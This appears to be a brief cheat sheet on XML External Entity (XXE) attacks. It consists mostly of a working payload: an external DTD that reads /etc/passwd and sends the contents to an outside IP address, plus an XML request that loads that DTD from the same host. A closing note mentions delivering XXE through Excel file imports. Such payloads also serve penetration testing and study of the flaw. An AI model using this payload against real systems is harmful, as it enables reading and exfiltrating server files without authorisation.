XXE

XML External Entity attacks

External DTD

test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://20.71.182.195/?%p1;'>">
%p2;

http.request
Content-Type: application/xml
Content-Type: text/xml
..
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://20.71.182.195/test.dtd">
    %ext;
]>
<message>&e1;</message>

Excel Import

Excel is a zip file structure with XML docs. In case the application import XML files, there is a chance XXE will be processed.

Exploiting XXE with Excel4ARMED Cloud Security Professional Services

Import Excel to invoke XXE